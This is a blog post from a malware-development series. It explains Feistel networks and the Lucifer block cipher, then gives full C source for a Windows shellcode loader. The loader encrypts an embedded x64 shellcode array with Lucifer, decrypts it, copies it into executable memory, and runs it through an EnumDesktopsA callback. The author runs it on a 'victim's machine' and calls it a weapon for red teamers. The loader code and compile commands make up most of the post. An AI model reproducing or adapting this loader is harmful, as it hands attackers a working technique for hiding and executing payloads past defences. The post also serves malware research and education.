20 minute read

Hello, cybersecurity enthusiasts and white hackers!

cryptography

This post is the result of my own research on using Lucifer block cipher on malware development. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.

Feistel networks

At the request of my readers, I would like to remind you what the Feistel network is. This is a very important concept that plays a vital role in modern cryptography and encryption systems.

The Feistel network is a block encryption technique created by Horst Feistel at IBM Labs in 1971.

The Feistel network is a block cipher structure that processes data by splitting each block into two equal parts: the left \( L \) and right \( R \) subblocks. The left subblock is transformed using a function: \[ x = f(L,K) \] where \( K \) represents the key. This function can be any cryptographic operation, such as a shift cipher.
The transformed left subblock is then XORed with the unchanged right subblock: \( x = x \oplus R \).
After this, the left and right subblocks are swapped, and the process repeats for multiple rounds.
So the final output is the encrypted data.

Lucifer

Lucifer is one of the earliest block ciphers, created in the 1970s by Horst Feistel at IBM. It is a symmetric-key cipher that functions on 128-bit blocks and utilizes a Feistel network, which served as the basis for the more prominent Data Encryption Standard (DES).

In Lucifer encryption, the plaintext is bifurcated into two segments, with one segment undergoing transformation and the resultant output being XORed with the other segment. This procedure is reiterated across several iterations employing S-boxes, permutations, and key schedules to guarantee security.

Lucifer’s S-boxes accept 4-bit inputs and produce 4-bit outputs; the input for the S-boxes is derived from the bit-permuted output of the S-boxes from the preceding round, whereas the input for the S-boxes in the initial round is the plaintext. A crucial bit is utilized to select the specific S-box from two available options. Lucifer is depicted as a singular T-box with 9 input bits and 8 output bits. In contrast to DES, there is no interchange between rounds, and no block halves are utilized. Lucifer employs 16 rounds, utilizes 128-bit blocks, and features a key schedule that is less complex than that of DES.

practical example 1

Let’s implement it in practice. First of all we need to define auxiliary functions, constants, and macros:

#define block_size 16 // 128 bit
#define key_size 16   // 128 bit

static const unsigned char s0[16] = {
  0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00,
  0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08
};

static const unsigned char s1[16] = {
  0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04,
  0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05
};

static const unsigned char m1[8] = {
  0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01
};

static const unsigned char m2[8] = {
  0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE
};

// macro to perform bitwise shifts
#define shift_left(x, n) ((x) << (n))
#define shift_right(x, n) ((unsigned char)(x) >> (n))

// extract high and low nibbles
#define highsubbyte(x) shift_right((x), 4)
#define lowsubbyte(x) ((x) & 0x0F)

// swap function for char types
void swap(char* arg1, char* arg2) {
  char tmp = *arg1;
  *arg1 = *arg2;
  *arg2 = tmp;
}

Then we need main encryption function.
Let me show a step-by-step explanation of our Lucifer encryption function.

The function takes a 128-bit block (16 bytes) and a key as inputs. The block is divided into two equal halves: the lower_half (first 8 bytes) and the upper_half (last 8 bytes):

char* lower_half = block;
char* upper_half = block + block_size / 2;

If decrypting, the initial key byte index is set to 8, otherwise, it starts at 0. A total of 16 rounds are performed during encryption or decryption:

int key_byte_idx = decrypt ? 8 : 0;
const int round_count = 16;

We start a loop for 16 rounds of transformations. If decrypting, the key index is incremented by 1 after each round and looped back (using modulus) after reaching 16:

for (int round = 0; round < round_count; ++round) {
  if (decrypt) {
    key_byte_idx = (key_byte_idx + 1) % round_count;
  }

In each round, we process 8 steps (one for each byte in the upper_half). Here, message_byte is the byte from upper_half that we are processing in this step:

for (int step = 0; step < 8; ++step) {
  char message_byte = upper_half[step];

This block applies the confusion step. Based on the key byte and step, we decide whether to use s0 or s1 substitution boxes to modify the message_byte. This is similar to what happens in Feistel networks with S-boxes:

if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
  message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
} else {
  message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
}

Then the key interruption logic:

message_byte ^= key[key_byte_idx];

Here, the transformed byte is XORed with the key byte. This introduces additional complexity to the encryption and ensures that each byte of the message is influenced by the key.

The next step is the permutation step where bits in message_byte are shifted left or right based on predefined masks (m1). This step scrambles the bits to further spread the influence of each bit across the whole byte:

message_byte = (shift_right(message_byte & m1[0], 3)) |
               (shift_right(message_byte & m1[1], 4)) |
               (shift_left(message_byte & m1[2], 2)) |
               (shift_right(message_byte & m1[3], 1)) |
               (shift_left(message_byte & m1[4], 2)) |
               (shift_left(message_byte & m1[5], 4)) |
               (shift_right(message_byte & m1[6], 1)) |
               (shift_left(message_byte & m1[7], 1));

The resulting message_byte is XORed with various bits of lower_half. This diffuses the changes across the lower_half, ensuring that both halves of the block influence each other as the rounds progress:

lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
// repeat similar logic for other bits...

Then, we increment the key_byte_idx to ensure that a different key byte is used for the next step. If we are not decrypting, this happens for all steps except the last one:

if (step < step_count - 1 || decrypt) {
  key_byte_idx = (key_byte_idx + 1) % round_count;
}

At the end of each round, the lower_half and upper_half are swapped. This is a key part of the Feistel network design, ensuring that both halves of the block are processed in the next round:

for (int i = 0; i < block_size / 2; ++i) {
  swap(&lower_half[i], &upper_half[i]);
}

After all rounds are completed, the halves are swapped again to finish the encryption process. This ensures the final encrypted block follows the Feistel design:

for (int i = 0; i < block_size / 2; ++i) {
  swap(&block[i], &block[i + block_size / 2]);
}

Full source code of this function is looks like:

void Lucifer(char block[block_size], char key[key_size], bool decrypt) {
  char* lower_half = block;
  char* upper_half = block + block_size / 2;
  
  int key_byte_idx = decrypt ? 8 : 0;
  const int round_count = 16;
  
  for (int round = 0; round < round_count; ++round) {
    if (decrypt) {
      key_byte_idx = (key_byte_idx + 1) % round_count;
    }
    
    int transform_control_byte_idx = key_byte_idx;
    const int step_count = 8;
    
    for (int step = 0; step < step_count; ++step) {
      char message_byte = upper_half[step];
      
      // confusion
      if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
        message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
      } else {
        message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
      }
      
      // key interruption
      message_byte ^= key[key_byte_idx];
      
      // permutation
      message_byte = (shift_right(message_byte & m1[0], 3)) |
               (shift_right(message_byte & m1[1], 4)) |
               (shift_left(message_byte & m1[2], 2)) |
               (shift_right(message_byte & m1[3], 1)) |
               (shift_left(message_byte & m1[4], 2)) |
               (shift_left(message_byte & m1[5], 4)) |
               (shift_right(message_byte & m1[6], 1)) |
               (shift_left(message_byte & m1[7], 1));
      
      // diffusion
      lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
      lower_half[(6 + step) % step_count] = ((message_byte ^ lower_half[(6 + step) % step_count]) & m1[1]) | (lower_half[(6 + step) % step_count] & m2[1]);
      lower_half[(2 + step) % step_count] = ((message_byte ^ lower_half[(2 + step) % step_count]) & m1[2]) | (lower_half[(2 + step) % step_count] & m2[2]);
      lower_half[(1 + step) % step_count] = ((message_byte ^ lower_half[(1 + step) % step_count]) & m1[3]) | (lower_half[(1 + step) % step_count] & m2[3]);
      lower_half[(5 + step) % step_count] = ((message_byte ^ lower_half[(5 + step) % step_count]) & m1[4]) | (lower_half[(5 + step) % step_count] & m2[4]);
      lower_half[(0 + step) % step_count] = ((message_byte ^ lower_half[(0 + step) % step_count]) & m1[5]) | (lower_half[(0 + step) % step_count] & m2[5]);
      lower_half[(3 + step) % step_count] = ((message_byte ^ lower_half[(3 + step) % step_count]) & m1[6]) | (lower_half[(3 + step) % step_count] & m2[6]);
      lower_half[(4 + step) % step_count] = ((message_byte ^ lower_half[(4 + step) % step_count]) & m1[7]) | (lower_half[(4 + step) % step_count] & m2[7]);
      
      if (step < step_count - 1 || decrypt) {
        key_byte_idx = (key_byte_idx + 1) % round_count;
      }
    }
    
    // swap halves
    for (int i = 0; i < block_size / 2; ++i) {
      swap(&lower_half[i], &upper_half[i]);
    }
  }
  
  // physically swap halves
  for (int i = 0; i < block_size / 2; ++i) {
    swap(&block[i], &block[i + block_size / 2]);
  }
}

So, the function processes a 128-bit block using 16 rounds of confusion, diffusion, and permutation.
Each round involves modifying bytes from the upper_half and diffusing changes to the lower_half.
The key is used to control S-box substitution and XOR operations at every step.
The halves of the block are swapped after every round, following the Feistel network design.

And finally, full source code of how we can encrypt plaintext block is looks like this (hack.c):

/*
 * hack.c
 * Lucifer encryption example
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html
 */
#include <stdio.h>
#include <stdbool.h>
#include <string.h>

#define block_size 16 // 128 bit
#define key_size 16   // 128 bit

static const unsigned char s0[16] = {
  0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00,
  0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08
};

static const unsigned char s1[16] = {
  0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04,
  0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05
};

static const unsigned char m1[8] = {
  0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01
};

static const unsigned char m2[8] = {
  0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE
};

// macro to perform bitwise shifts
#define shift_left(x, n) ((x) << (n))
#define shift_right(x, n) ((unsigned char)(x) >> (n))

// extract high and low nibbles
#define highsubbyte(x) shift_right((x), 4)
#define lowsubbyte(x) ((x) & 0x0F)

// swap function for char types
void swap(char* arg1, char* arg2) {
  char tmp = *arg1;
  *arg1 = *arg2;
  *arg2 = tmp;
}

void Lucifer(char block[block_size], char key[key_size], bool decrypt) {
  char* lower_half = block;
  char* upper_half = block + block_size / 2;
  
  int key_byte_idx = decrypt ? 8 : 0;
  const int round_count = 16;
  
  for (int round = 0; round < round_count; ++round) {
    if (decrypt) {
      key_byte_idx = (key_byte_idx + 1) % round_count;
    }
    
    int transform_control_byte_idx = key_byte_idx;
    const int step_count = 8;
    
    for (int step = 0; step < step_count; ++step) {
      char message_byte = upper_half[step];
      
      // confusion
      if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
        message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
      } else {
        message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
      }
      
      // key interruption
      message_byte ^= key[key_byte_idx];
      
      // permutation
      message_byte = (shift_right(message_byte & m1[0], 3)) |
               (shift_right(message_byte & m1[1], 4)) |
               (shift_left(message_byte & m1[2], 2)) |
               (shift_right(message_byte & m1[3], 1)) |
               (shift_left(message_byte & m1[4], 2)) |
               (shift_left(message_byte & m1[5], 4)) |
               (shift_right(message_byte & m1[6], 1)) |
               (shift_left(message_byte & m1[7], 1));
      
      // diffusion
      lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
      lower_half[(6 + step) % step_count] = ((message_byte ^ lower_half[(6 + step) % step_count]) & m1[1]) | (lower_half[(6 + step) % step_count] & m2[1]);
      lower_half[(2 + step) % step_count] = ((message_byte ^ lower_half[(2 + step) % step_count]) & m1[2]) | (lower_half[(2 + step) % step_count] & m2[2]);
      lower_half[(1 + step) % step_count] = ((message_byte ^ lower_half[(1 + step) % step_count]) & m1[3]) | (lower_half[(1 + step) % step_count] & m2[3]);
      lower_half[(5 + step) % step_count] = ((message_byte ^ lower_half[(5 + step) % step_count]) & m1[4]) | (lower_half[(5 + step) % step_count] & m2[4]);
      lower_half[(0 + step) % step_count] = ((message_byte ^ lower_half[(0 + step) % step_count]) & m1[5]) | (lower_half[(0 + step) % step_count] & m2[5]);
      lower_half[(3 + step) % step_count] = ((message_byte ^ lower_half[(3 + step) % step_count]) & m1[6]) | (lower_half[(3 + step) % step_count] & m2[6]);
      lower_half[(4 + step) % step_count] = ((message_byte ^ lower_half[(4 + step) % step_count]) & m1[7]) | (lower_half[(4 + step) % step_count] & m2[7]);
      
      if (step < step_count - 1 || decrypt) {
        key_byte_idx = (key_byte_idx + 1) % round_count;
      }
    }
    
    // swap halves
    for (int i = 0; i < block_size / 2; ++i) {
      swap(&lower_half[i], &upper_half[i]);
    }
  }
  
  // physically swap halves
  for (int i = 0; i < block_size / 2; ++i) {
    swap(&block[i], &block[i + block_size / 2]);
  }
}

int main() {
  char message[block_size + 1] = "meowmeowmeowmeow";  // 16 characters + null terminator
  char key[key_size] = "abcdefghijklmnop";      // example 128-bit key

  message[block_size] = '\0';  // add a null terminator at the end of the message

  printf("original block: %s\n", message);

  Lucifer(message, key, false);  // encrypt
  printf("encrypted block: ");
  for (int i = 0; i < block_size; i++) {
    printf("%02x ", (unsigned char)message[i]);
  }
  printf("\n");

  Lucifer(message, key, true);  // decrypt
  printf("decrypted block: %s\n", message);

  return 0;
}

As you can, see in the main function I just encrypted meowmeowmeowmeow message.

demo 1

Let’s see how this code works. Compile it for linux:

gcc hack.c -o hack

cryptography

Then. run it:

./hack

cryptography

As you can see, everything is worked perfectly in this case.

practical example 2

Let’s implement it with another logic: encrypt/decrypt payload and run it.

Source code for this is like in the first example, the only differences are two new functions:

// payload encryption function
void lucifer_encrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
  for (int i = 0; i < payload_len / block_size; i++) {
    Lucifer((char*)(payload + i * block_size), (char*)key, false);
  }
}

// payload decryption function
void lucifer_decrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
  for (int i = 0; i < payload_len / block_size; i++) {
    Lucifer((char*)(payload + i * block_size), (char*)key, true);
  }
}

This version of the code correctly implements the Lucifer cipher using the function from hack.c, while applying the encryption and decryption process to payload blocks. The Lucifer function is integrated within lucifer_encrypt_payload and lucifer_decrypt_payload, ensuring the correct encryption flow.

So the full source code is looks like this (hack2.c):

/*
 * hack.c
 * Lucifer payload encryption/decryption
 * author: @cocomelonc
 * https://cocomelonc.github.io/malware/2024/10/20/malware-cryptography-33.html
 */
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <windows.h>

#define block_size 16 // 128 bit
#define key_size 16   // 128 bit

static const unsigned char s0[16] = {
  0x0C, 0x0F, 0x07, 0x0A, 0x0E, 0x0D, 0x0B, 0x00,
  0x02, 0x06, 0x03, 0x01, 0x09, 0x04, 0x05, 0x08
};

static const unsigned char s1[16] = {
  0x07, 0x02, 0x0E, 0x09, 0x03, 0x0B, 0x00, 0x04,
  0x0C, 0x0D, 0x01, 0x0A, 0x06, 0x0F, 0x08, 0x05
};

static const unsigned char m1[8] = {
  0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01
};

static const unsigned char m2[8] = {
  0x7F, 0xBF, 0xDF, 0xEF, 0xF7, 0xFB, 0xFD, 0xFE
};

#define shift_left(x, n) ((x) << (n))
#define shift_right(x, n) ((unsigned char)(x) >> (n))
#define highsubbyte(x) shift_right((x), 4)
#define lowsubbyte(x) ((x) & 0x0F)

void swap(char* arg1, char* arg2) {
  char tmp = *arg1;
  *arg1 = *arg2;
  *arg2 = tmp;
}

void Lucifer(char block[block_size], char key[key_size], bool decrypt) {
  char* lower_half = block;
  char* upper_half = block + block_size / 2;

  int key_byte_idx = decrypt ? 8 : 0;
  const int round_count = 16;

  for (int round = 0; round < round_count; ++round) {
    if (decrypt) {
      key_byte_idx = (key_byte_idx + 1) % round_count;
    }

    int transform_control_byte_idx = key_byte_idx;
    const int step_count = 8;

    for (int step = 0; step < step_count; ++step) {
      char message_byte = upper_half[step];

      // confusion
      if (key[transform_control_byte_idx] & m1[step_count - step - 1]) {
        message_byte = shift_left(s1[highsubbyte(message_byte)], 4) | s0[lowsubbyte(message_byte)];
      } else {
        message_byte = shift_left(s0[highsubbyte(message_byte)], 4) | s1[lowsubbyte(message_byte)];
      }

      // key interruption
      message_byte ^= key[key_byte_idx];

      // permutation
      message_byte = (shift_right(message_byte & m1[0], 3)) |
               (shift_right(message_byte & m1[1], 4)) |
               (shift_left(message_byte & m1[2], 2)) |
               (shift_right(message_byte & m1[3], 1)) |
               (shift_left(message_byte & m1[4], 2)) |
               (shift_left(message_byte & m1[5], 4)) |
               (shift_right(message_byte & m1[6], 1)) |
               (shift_left(message_byte & m1[7], 1));

      // diffusion
      lower_half[(7 + step) % step_count] = ((message_byte ^ lower_half[(7 + step) % step_count]) & m1[0]) | (lower_half[(7 + step) % step_count] & m2[0]);
      lower_half[(6 + step) % step_count] = ((message_byte ^ lower_half[(6 + step) % step_count]) & m1[1]) | (lower_half[(6 + step) % step_count] & m2[1]);
      lower_half[(2 + step) % step_count] = ((message_byte ^ lower_half[(2 + step) % step_count]) & m1[2]) | (lower_half[(2 + step) % step_count] & m2[2]);
      lower_half[(1 + step) % step_count] = ((message_byte ^ lower_half[(1 + step) % step_count]) & m1[3]) | (lower_half[(1 + step) % step_count] & m2[3]);
      lower_half[(5 + step) % step_count] = ((message_byte ^ lower_half[(5 + step) % step_count]) & m1[4]) | (lower_half[(5 + step) % step_count] & m2[4]);
      lower_half[(0 + step) % step_count] = ((message_byte ^ lower_half[(0 + step) % step_count]) & m1[5]) | (lower_half[(0 + step) % step_count] & m2[5]);
      lower_half[(3 + step) % step_count] = ((message_byte ^ lower_half[(3 + step) % step_count]) & m1[6]) | (lower_half[(3 + step) % step_count] & m2[6]);
      lower_half[(4 + step) % step_count] = ((message_byte ^ lower_half[(4 + step) % step_count]) & m1[7]) | (lower_half[(4 + step) % step_count] & m2[7]);

      if (step < step_count - 1 || decrypt) {
        key_byte_idx = (key_byte_idx + 1) % round_count;
      }
    }

    // swap halves
    for (int i = 0; i < block_size / 2; ++i) {
      swap(&lower_half[i], &upper_half[i]);
    }
  }

  // physically swap halves
  for (int i = 0; i < block_size / 2; ++i) {
    swap(&block[i], &block[i + block_size / 2]);
  }
}

// payload encryption function
void lucifer_encrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
  for (int i = 0; i < payload_len / block_size; i++) {
    Lucifer((char*)(payload + i * block_size), (char*)key, false);
  }
}

// payload decryption function
void lucifer_decrypt_payload(unsigned char* payload, int payload_len, unsigned char* key) {
  for (int i = 0; i < payload_len / block_size; i++) {
    Lucifer((char*)(payload + i * block_size), (char*)key, true);
  }
}

int main() {
  unsigned char key[16] = "meowmeowbowwoow"; // example 128-bit key
  unsigned char my_payload[] = {
    0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0,
    0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
    0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
    0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
    0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2,
    0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52,
    0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
    0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
    0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
    0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
    0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
    0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
    0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6,
    0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41,
    0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x3e,
    0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
    0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
    0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
    0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x0, 0x0, 0x0,
    0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d,
    0x85, 0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
    0x56, 0x7, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2,
    0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d, 0x65, 0x6f, 0x77,
    0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
  };

  int my_payload_len = sizeof(my_payload);
  int pad_len = my_payload_len + (block_size - my_payload_len % block_size) % block_size;

  unsigned char padded[pad_len];
  memset(padded, 0x90, pad_len);  // pad with NOPs (0x90)
  memcpy(padded, my_payload, my_payload_len);

  printf("original payload: ");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", my_payload[i]);
  }
  printf("\n\n");

  // encrypt the payload
  lucifer_encrypt_payload(padded, pad_len, key);

  printf("encrypted payload: ");
  for (int i = 0; i < pad_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  // decrypt the payload
  lucifer_decrypt_payload(padded, pad_len, key);

  printf("decrypted payload: ");
  for (int i = 0; i < my_payload_len; i++) {
    printf("%02x ", padded[i]);
  }
  printf("\n\n");

  LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  RtlMoveMemory(mem, padded, my_payload_len);
  EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
  return 0;
}

As usually, I used meow-meow messagebox payload here:

unsigned char my_payload[] = {
  0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0,
  0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
  0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
  0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
  0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2,
  0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52,
  0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
  0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
  0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
  0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
  0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
  0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
  0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6,
  0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41,
  0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x3e,
  0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
  0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
  0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
  0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x0, 0x0, 0x0,
  0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d,
  0x85, 0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
  0x56, 0x7, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2,
  0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d, 0x65, 0x6f, 0x77,
  0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
};

Also, this code correctly maintaining the padding scheme and payload length.

demo 2

Let’s go to see everything in action. Compile it (in my linux machine):

x86_64-w64-mingw32-gcc -O2 hack2.c -o hack2.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

cryptography

Then, just run it in the victim’s machine (windows 11 x64 in my case):

.\hack2.exe

cryptography

cryptography

As you can see, everything is worked perfectly! =^..^=

Calculating Shannon entropy:

python3 entropy.py -f hack2.exe

cryptography

Our payload in the .text section.

As you know, many of the encryption algorithms I have looked at in my research and on this blog are used Feistel networks.

cryptoanalysis

Biham and Shamir (E. Biham and A. Shamir, “Differential Cryptanalysis of Snefru, Khafre, REDOC–II, LOKI, and Lucifer,” Advances in Cryptology—CRYPTO ’91 Proceedings, 1992, pp. 156–171 and E. Biham and A. Shamir, Differential Cryptanalysis of the Data Encryption Standard, Springer–Verlag, 1993) demonstrated that the initial version of Lucifer, utilizing 32-bit blocks and 8 rounds, is susceptible to differential cryptanalysis, requiring 40 chosen plaintexts and \( 2^{29} \) steps; similarly, the same attack can compromise Lucifer with 128-bit blocks and 8 rounds, necessitating 60 chosen plaintexts and \( 2^{53} \) steps. A differential cryptanalytic attack successfully compromises 18-round, 128-bit Lucifer using 24 selected plaintexts in 221 steps.

I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.

Malware and cryptography 1
source code in github
E. Biham and A. Shamir, “Differential Cryptanalysis of Snefru, Khafre, REDOC–II, LOKI, and Lucifer,” Advances in Cryptology—CRYPTO ’91 Proceedings, 1992, pp. 156–171

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine